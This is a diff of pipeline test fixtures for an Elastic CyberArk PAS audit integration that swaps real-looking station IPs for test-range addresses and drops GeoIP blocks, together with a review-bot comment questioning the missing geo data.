Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File 
Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json
index 172f8e5ba34..fac8bcfa4dd 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json
@@ -63,7 +63,7 @@
 "event": {
 "severity": 2,
 "action": "add file category",
- "ingested": "2021-06-09T10:24:27.789413200Z",
+ "ingested": "2021-12-09T13:36:36.022887100Z",
 "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"10.0.1.20\"}}}",
 "code": "105",
 "kind": "event"
@@ -76,20 +76,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
 }
 },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
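Review bot: The `@@ -76,20 +76,8 @@` hunk removes the whole `source.geo` object for 67.43.156.13 instead of replacing the Barcelona entry with the geo data of the new address, which runs against the stated purpose of moving to the "supported subset" of test IPs. As far as I know the GeoLite2 test databases that elastic-package mounts into its test stack cover 67.43.156.0/24 precisely so that geo enrichment is deterministic, so an absent `geo` block more likely means the expected file was regenerated on a stack where the geoip processor could not enrich (test database not loaded) than that the pipeline genuinely emits no geo data; please regenerate the expected output with the test databases present and confirm a `geo` object comes back. The `ingested` changes in `@@ -63` here and in `@@ -134` further down are unrelated churn from regeneration; if the elastic-package version in use supports `dynamic_fields` in the pipeline test config, declaring `event.ingested` there would keep IP-only fixes from touching those lines.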
@@ -109,7 +97,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -119,7 +107,7 @@
 "iso_timestamp": "2021-03-10T09:11:54Z",
 "file": "Root\\PSMPApp_localhost.localdomain.LiveSessions",
 "safe": "PSMPLiveSessions",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Add File Category",
 "message": "Add File Category",
 "category": "_PSMLiveSessions_1",
@@ -134,8 +122,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789440300Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022896800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } 
@@ -147,20 +135,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -180,7 +156,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -190,7 +166,7 @@
 "iso_timestamp": "2021-03-10T18:46:48Z",
 "file": "Root\\PSMServer.LiveSessions",
 "safe": "PSMLiveSessions",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Add File Category",
 "message": "Add File Category",
 "category": "_PSMLiveSessions_1",
@@ -205,8 +181,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789448Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022905400Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } 
@@ -218,19 +194,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -250,7 +215,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -263,7 +228,7 @@
 "rfc5424": true,
 "file": "Root\\PSM-ASR-CYBERARK-WI",
 "safe": "PSM",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Add File Category",
 "category": "LogonDomain",
 "timestamp": "Mar 10 14:17:26",
@@ -276,8 +241,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789478800Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"LogonDomain\",\"RequestId\":\"\",\"Reason\":\"Value=[ASR-CYBERARK-WI]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022911900Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"LogonDomain\",\"RequestId\":\"\",\"Reason\":\"Value=[ASR-CYBERARK-WI]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } 
@@ -289,19 +254,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -321,7 +275,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -331,7 +285,7 @@
 "iso_timestamp": "2021-03-10T22:20:12Z",
 "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions",
 "safe": "PSMLiveSessions",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Add File Category",
 "message": "Add File Category",
 "category": "_PSMLiveSessions_1",
@@ -346,8 +300,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789486200Z", - "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022918200Z", + "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } 
@@ -359,20 +313,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -392,20 +334,20 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T16:59:58Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e105\u003c/MessageID\u003e\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e105\u003c/MessageID\u003e\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Add File Category", "issuer": "PSMPApp_VAGRANT", "rfc5424": true, "file": "Root\\PSMPApp_VAGRANT.LiveSessions", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add File Category", "category": "_PSMLiveSessions_1", "timestamp": "Mar 11 08:59:58", 
@@ -418,8 +360,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789492200Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e105\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add File 
Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022924500Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e105\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log index 14adbc29da4..f6be50ea2bc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log 
@@ -1,6 +1,6 @@ <5>1 2021-03-08T18:25:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:25:52","IsoTimestamp":"2021-03-08T18:25:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"Administrator","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[components] Old Value=[Address]","ExtraDetails":"","Message":"Update File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File 
